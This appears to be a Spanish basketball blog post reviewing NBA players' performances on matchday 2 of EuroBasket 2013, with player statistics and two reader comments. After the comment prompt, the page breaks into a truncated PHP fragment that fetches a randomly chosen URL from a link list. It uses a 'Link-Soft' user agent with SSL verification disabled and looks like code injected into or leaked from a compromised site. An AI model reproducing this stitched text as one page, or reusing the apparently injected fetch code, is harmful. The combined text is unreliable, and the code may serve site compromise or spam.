EuroNBAsket 2013: Jornada 2

06 de September de 2013 por txusma

La jornada inaugural nos dejó el cuerpo algo fríos pero tan solo ha hecho falta que Eslovenia le sacara las vergüenzas a España en la 2ª parte para que el Eurobasket recobre mucho interés. Con la victoria sobre los españoles, son los eslovenos los que lideran el grupo C en solitario con 2 victorias. También llevan dos victorias Ucraina, tras vencer a Israel; Serbia, que se deshizo con relativa facilidad de los bosnios; Letonia, gracias a un triple de Janicenoks a 6 segundos por final que les adelantaba sobre Montenegro; Grecia, que sigue con paso firme tras su victoria sobre Rusia; Italia, que se está gustando y ayer machacó a una deplorable Turquía, y la sorprendente Finlandia que apabulló a los suecos.

En el grupo A, Francia de recobró de la derrota en la primera jornada con una clara victoria frente Gran Bretaña pero Alemania, en un alarde de irregularidad, cayó por sorpresa ante Bélgica lo que deja el grupo muy abierto. En el grupo B, Lituania ganó a una Macedonia que queda contra las cuerdas tras perder los 2 primeros partidos, lo mismo que Polonia en el C que volvió a caer esta vez frente la República Checa por culpa de un triple de Lubos Barton. Croacia, sin embargo, consiguió la victoria frente Georgia gracias a una bandeja de Ante Tomic que les mantiene vivos.

Repasemos cómo le ha ido a los NBA. 

DESTACADOS

Jan Vesely: Extraordinario con números de superestrella. 24 puntos, 14 rebotes, 4 robos y 2 asistencias, poniéndole la puntilla final a Polonia. No se entiende la diferencia de versión entre el de la NBA y éste.

Viacheslav Kravtsov: Actuación muy sólida asegurando la segunda victoria “fácil” de Ukrania en el grupo A. 15 puntos, 8 rebotes, 1 tapón y una asistencia.

Goran Dragic: Machacó a los españoles en la 2ª parte y acabó con 18 puntos, 7 asistencias, 6 rebotes y un par de robos.

Tony Parker: Decidido a que no se repitiera la sorpresa del primer día. Anotó 16 puntos con un 70% de acierto y además repartió 5 asistencias y robó 2 balones.

Nico Batum: Otro que se fue al 70% de acierto aunque con un puntito más, 17.

Bojan Bogdanovic: Fundamental junto a Draper salvando a Croacia frente Georgia. Pura anotación, 15 puntos 1 rebote y un robo, pero mostrando presencia en los momentos más difíciles, cuando el balón más quema.

Marco Belinelli: Otra buena actuación. Si ayer se complementaba con Datome hoy lo hacía con Aradori y Gentile. Parece que Italia tiene muchas más armas que todos pensábamos. 17 puntos, 2 rebotes, 2 asistencias.

Nemanja Nedovic: Otro buen partido. No tan letal como ayer contra Lituania pero aportando en muchas facetas. Fue el máximo asistente de su equipo. 11 puntos, 6 asistencias, 4 rebotes, 1 robo.

Jeffery Taylor: A la suya, porque Suecia es mucha banda. Partido completo con 19 puntos, 6 rebotes, 2 asistencias y 1 robo. Tirándose hasta las zapatillas, pero tampoco queda otra.

Mirza Teletovic: Similar a ayer. 16 puntos, 5 rebotes, 2 tapones y 1 asistencia. 33% de acierto. Haciendo la guerra por su cuenta, una guerra que tiene perdida.

Sergey Karasev: Apareció el rookie de los Cavs con un partido bastante completo. 10 puntos, 7 rebotes, 2 asistencias y 2 tapones, el mejor de su equipo.

Alexey Shved: 17 puntos, 3 asistencias y 4 rebotes pero 5 pérdidas producto del poco empuje de sus compañeros.

DECEPCIONANTES

Omri Casspi: Horripilante de cara al aro. Falló sus 5 triples y sólo anotó una canasta en juego. 6 puntos (1 de 8) 1 único rebote, 1 asistencia y dos robos.

Nikola Vucevic: Otra vez reserva y más intrascendente aún que ayer. Mentalmente se le ve muy fuera. 1 de 7 en tiro; 4 puntos y 1 rebote en 14 minutos de juego.

Luigi Datome: Como la noche al día la diferencia con el partido de ayer. Lo falló todo. En su favor hay que decir que viéndose mal no forzó protagonismo y aportó un trabajo más oscuro. 4 rebotes, 1 asistencia y un tapón. Su media anotadora cae la mitad con 0 puntos (0 de 6).

– Marcin Gortat: Como su equipo, Gortat volvió a decepcionar. Su trabajo bajo los aros, con 9 rebotes y 3 tapones, se quedó en nada por su escaso protagonismo ofensivo. Apenas anotó 5 puntos con 2 de 7 en tiros de campo. En su favor, cuando él estuvo en pista el balance fue de un +15 para Polonia.

Comenta

2 comentarios a esta entrada

  1. jhc dice:
    #1

    Y Vucevic sigue arruinandome el supermanager… una duda Jan Vesely estaba bastante mosqueado con los Wizards al querer estos que ganara peso y Vesely se negó, suena de algun traspaso o se calmaron los ánimos

      Citar

  2. rumbero dice:
    #2

    jhc:
    Y Vucevic sigue arruinandome el supermanager… una duda Jan Vesely estaba bastante mosqueado con los Wizards al querer estos que ganara peso y Vesely se negó, suena de algun traspaso o se calmaron los ánimos

    Pues ayer contra Bosnia más de lo mismo. Ni 15 minutos y sin ir con él la cosa. Está como Vesely pero cambiando equipo por selección. Tema mental/confianza
    Del checo de momento no se sabe nada nuevo por ahora, pero lo cierto es que si esta temporada los Wizards van a por PO si o si y eso supone que aún tenga menos minutos esta temporada no se yo si tiene mucho sentido que sigan contando con él

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>